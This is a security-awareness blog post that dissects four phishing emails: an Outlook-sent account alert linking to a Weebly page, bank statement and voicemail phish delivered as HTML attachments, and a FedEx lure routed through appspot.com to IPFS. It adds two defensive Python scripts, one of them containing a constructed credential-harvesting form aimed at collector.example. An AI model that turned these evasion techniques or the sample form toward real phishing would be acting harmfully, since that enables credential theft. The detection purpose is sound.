Catch of the Day: Email Compromise Phish
Chef’s Special: Bank Statement Phish
Also serving: Voicemail Phish, FedEx Phish
Examples of clever phish that made it past my anti-spam nets and into my inbox. Some are contributed by clients, readers like you, or other reliable sources on the Internet.
You can send phishing samples to me at phish@wyzguys.com.
My intention is to provide a warning and show current examples of phishing scams, related articles, and education about how these scams and exploits work and how to detect them in your inbox.
Email “Comprise” Phish
If you are going to send phishing emails, at least make sure they are correctly spelled. While “comprise” is a word, it is not the one meant here; the attacker meant “compromise”.
The email sender is an outlook.com account: MAIL ADMINiSTRATOR <wheatsheafbakewell@outlook.com>. The display name claims to be a mail administrator, but the address is a free outlook.com mailbox rather than an account on the recipient's own domain; that mismatch between display name and actual address is the first tell. Not sure who wheatsheafbakewell is, but a quick search does find a restaurant of that name in the UK. The word ADMINiSTRATOR also has a lowercase i where a capital belongs.
The CANCEL REQUEST NOW link resolves to a Weebly-hosted site at https://newdivers.weebly.com/. Using a legitimate commercial hosting platform is a fairly common way to deploy phishing landing pages: the site comes with a valid TLS certificate and a reputable parent domain, so the browser padlock and simple domain-reputation filters raise no warning, and everything appears more credible.
This is a typical credential-stealing page.
A day later, as I write this on August 9, it seems the site has been taken down. This is one of the drawbacks, from the attacker's side, of using a commercial site host such as Weebly: the phishing sites get taken down quickly, often in a matter of hours. Cybersecurity teams in action!
Bank Statement Phish
One way to get around the hosting problem we saw in the previous case is to send the landing page itself as an HTML attachment. When you open the attachment, your web browser renders it straight from the file on disk and displays a web page like the one below. Your own computer, in essence, is the web server for this page, so there is no hosted site for anyone to report or take down; the only remote piece is the server the form submits the typed credentials to.
Here’s the email with the HTML attachment
And here is the credential-stealing login page. If you look in the address bar, you can see the source is a file on the system at file:///mozilla_kali0/Bank_Statement_Report_0384783.html. In this instance, this is the Mozilla Firefox application on my Kali Linux virtual machine. There is no time limit on this sort of self-hosting exploit. The HTML attachment will work as long as the attacker maintains the server collecting the login credentials of their victims, which is why many mail gateways are configured to block or quarantine .html and .htm attachments outright.
Voicemail Phish
And here is another example of the HTML attachment exploit.
Here are two landing pages. The first appears to be a CAPTCHA.
The second page is designed to capture my password. This page also uses my own logo to provide additional credibility. Too bad it is a bit squashed.
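Both the Bank Statement and Voicemail phish above arrive as HTML attachments, so there is no hosted URL to look up; what a defender can check is where the attached page sends whatever the victim types. The following is an added example, not the post's own tooling: it parses a saved message (.eml), pulls out the HTML attachments, and reports each login form's action URL, the number of password fields, and any absolute URLs hard-coded in script blocks (kits sometimes submit from JavaScript instead of a form action). The sample message, the statements@example.net sender and the collector.example destination are constructed for the demonstration and are not from the phish shown on this page.

```python
"""Find HTML attachments in a saved message (.eml) and report where their
login forms send credentials. Added example, not the post's own tooling."""
import email
import email.policy
import re
from email.message import EmailMessage
from html.parser import HTMLParser

ABS_URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")


class FormTargetParser(HTMLParser):
    """Collect <form action> targets, count password inputs, keep script text."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self._in_script = False
        self._script_text = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._script_text.append(data)

    def script_urls(self):
        """Absolute URLs hard-coded in JavaScript; kits often POST from script."""
        return sorted(set(ABS_URL_RE.findall("".join(self._script_text))))


def analyze_html(html_text):
    """Summarize one HTML page: form targets, password inputs, script URLs."""
    parser = FormTargetParser()
    parser.feed(html_text)
    parser.close()
    actions = parser.form_actions
    script_urls = parser.script_urls()
    return {
        "form_actions": actions,
        "password_fields": parser.password_fields,
        "script_urls": script_urls,
        # A password field plus any remote target is the credential-harvester signature.
        "suspicious": parser.password_fields > 0
        and any(u.startswith(("http://", "https://")) for u in actions + script_urls),
    }


def analyze_eml(raw_bytes):
    """Return one finding per HTML attachment in the message."""
    msg = email.message_from_bytes(raw_bytes, policy=email.policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".html", ".htm")):
            continue
        text = part.get_payload(decode=True).decode("utf-8", "replace")
        finding = analyze_html(text)
        finding["filename"] = name
        findings.append(finding)
    return findings


def build_sample_eml():
    """Constructed sample, not a real phish: an attached statement page whose
    form posts to a hypothetical collector.example server."""
    page = """<html><body><h2>Bank Statement Report</h2>
<form method="POST" action="https://collector.example/post.php">
  <input name="email" placeholder="Email"><input type="password" name="pass">
  <button>View statement</button></form>
<script>var fallback = "https://collector.example/api/log";</script>
</body></html>"""
    msg = EmailMessage()
    msg["From"] = "Statements <statements@example.net>"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Your bank statement is ready"
    msg.set_content("Your statement is attached. Open it to review.")
    msg.add_attachment(page.encode(), maintype="text", subtype="html",
                       filename="Bank_Statement_Report.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for f in analyze_eml(build_sample_eml()):
        print(f["filename"], "suspicious" if f["suspicious"] else "clean",
              f["form_actions"], f["script_urls"])
```

To run it against a real sample, save the message from your mail client as .eml and pass the file's bytes to analyze_eml; the form action or script URL it reports is the collection server the attacker has to keep alive, and the thing to block or report. A relative action (one that does not start with http) would post to file:// and go nowhere, so only absolute targets count toward the suspicious flag.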
FedEx Phish
This is the final phish for today. The sender address FedEx <support@servonline.com> looks more legitimate because of the servonline.com email domain. It is not fedex.com, but even big organizations sometimes send through other service providers, so a non-fedex.com sender is not conclusive on its own; the link target is the better test.
The CLICK HERE TO UPDATE NOW link resolves to https://vwjccviyvjllfsbw-dot-s0cr-wr0xs-bri0cx-erssaq.ue.r.appspot.com/. This exploit uses an appspot.com hosting site (Google App Engine), which then redirected to https://ipfs.io/ipfs/QmeikM3aPy1Ed85wGCsnEnHdA9hCXseR4HZpcaLhNPKz9t#undefined on ipfs.io, a public IPFS gateway. The part after /ipfs/ is a content hash rather than a path on ipfs.io, and the same content can be fetched through any other public gateway, so a takedown at one gateway does not remove the page. The landing page looks completely authentic. This landing page was still working 5 days later, so the redirection must help with longevity.
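The Weebly link in the first phish and the appspot.com link in this one are both worth resolving without a browser, one hop at a time, so that you see every host in the chain instead of only the final page. The following is an added example, not the post's own tooling: a resolver that follows HTTP 30x Location headers, <meta refresh> tags and simple JavaScript location= assignments, records each hop, flags hosts on known free-hosting platforms, and pulls the IPFS content hash out of gateway URLs. The network is replaced by a constructed fetcher that replays the two hops from the FedEx phish; the post does not say how appspot.com forwarded to ipfs.io, so the JavaScript redirect in the replay is an assumption, as are the example.test chain and the platform list, which is a starting point rather than a complete catalogue.

```python
"""Resolve a phishing link's redirect chain one hop at a time, without a
browser. Added example for this post; the platform list is illustrative."""
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

# Free or commercial hosting platforms that phish kits lean on. Assumption: a
# starter list (the ones seen in this post plus common lookalikes), not exhaustive.
HOSTING_SUFFIXES = ("weebly.com", "appspot.com", "web.app", "firebaseapp.com",
                    "github.io", "netlify.app", "ipfs.io", "dweb.link",
                    "cloudflare-ipfs.com")

META_REFRESH_RE = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*content=["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)',
    re.I)
JS_LOCATION_RE = re.compile(
    r'(?:window\.|document\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)


def hosting_platform(url):
    """Return the matching platform suffix for the URL's host, or None."""
    host = (urlparse(url).hostname or "").lower()
    for suffix in HOSTING_SUFFIXES:
        if host == suffix or host.endswith("." + suffix):
            return suffix
    return None


def ipfs_cid(url):
    """Pull the content identifier out of a gateway URL such as https://ipfs.io/ipfs/<cid>."""
    match = re.search(r"/ipfs/([A-Za-z0-9]+)", urlparse(url).path)
    return match.group(1) if match else None


def urllib_fetch(url):
    """Real fetcher: one request, redirects deliberately not followed.
    Returns (status, lowercase-keyed headers, first 64 KiB of body)."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # surface the 30x instead of following it

    opener = urllib.request.build_opener(NoRedirect)
    request = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(request, timeout=10) as resp:
            headers = {k.lower(): v for k, v in resp.headers.items()}
            return resp.status, headers, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}, ""


def next_hop(status, headers, body):
    """Work out where this response sends the browser next, if anywhere."""
    if 300 <= status < 400 and headers.get("location"):
        return headers["location"]
    match = META_REFRESH_RE.search(body) or JS_LOCATION_RE.search(body)
    return match.group(1) if match else None


def resolve_chain(url, fetch=urllib_fetch, max_hops=10):
    """Follow the chain, returning one record per hop; stops on loops or max_hops."""
    chain, seen = [], set()
    while url and len(chain) < max_hops:
        record = {"url": url, "status": None, "host": urlparse(url).hostname,
                  "platform": hosting_platform(url), "ipfs_cid": ipfs_cid(url), "note": ""}
        if url in seen:
            record["note"] = "redirect loop"
            chain.append(record)
            break
        seen.add(url)
        status, headers, body = fetch(url)
        record["status"] = status
        chain.append(record)
        target = next_hop(status, headers, body)
        url = urljoin(url, target) if target else None
    return chain


def replay_fetch(url):
    """Constructed stand-in for the network. Replays the two hops from the FedEx
    phish above (the JavaScript redirect is an assumption; the post only says
    the appspot.com link was redirected) plus a made-up 302 chain on
    example.test to exercise the HTTP-redirect path."""
    if url.endswith(".appspot.com/"):
        return 200, {"content-type": "text/html"}, (
            '<html><script>window.location.href="https://ipfs.io/ipfs/'
            'QmeikM3aPy1Ed85wGCsnEnHdA9hCXseR4HZpcaLhNPKz9t#undefined";</script></html>')
    if url.startswith("https://ipfs.io/ipfs/"):
        return 200, {"content-type": "text/html"}, "<html><form><input type=password></form></html>"
    if url == "https://example.test/start":
        return 302, {"location": "/landing"}, ""
    if url == "https://example.test/landing":
        return 200, {}, "<html>landing</html>"
    return 404, {}, ""


if __name__ == "__main__":
    start = "https://vwjccviyvjllfsbw-dot-s0cr-wr0xs-bri0cx-erssaq.ue.r.appspot.com/"
    for hop in resolve_chain(start, fetch=replay_fetch):
        print(hop["status"], hop["host"], hop["platform"], hop["ipfs_cid"])
```

Against a live link, call resolve_chain with the default urllib_fetch from an isolated analysis machine, never from the mailbox owner's workstation: the fetch itself can mark a tracking token as "opened". Every hop whose platform field is set is a report target (the platform's abuse desk), and a non-empty ipfs_cid tells you the final page will survive a single-gateway takedown, so block the hash at the proxy rather than just the ipfs.io hostname.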
About the Author:
I am a cybersecurity and IT instructor, cybersecurity analyst, pen-tester, trainer, and speaker. I am an owner of the WyzCo Group Inc. In addition to consulting on security products and services, I also conduct security audits, compliance audits, vulnerability assessments and penetration tests. I also teach Cybersecurity Awareness Training classes. I work as an information technology and cybersecurity instructor for several training and certification organizations. I have worked in corporate, military, government, and workforce development training environments. I am a frequent speaker at professional conferences such as the Minnesota Bloggers Conference, the Secure360 Security Conference in 2016, 2017, 2018 and 2019, the (ISC)2 World Congress 2016, and the ISSA International Conference 2017, and at many local community organizations, including Chambers of Commerce, SCORE, and several school districts. I have been blogging on cybersecurity since 2006 at http://wyzguyscybersecurity.com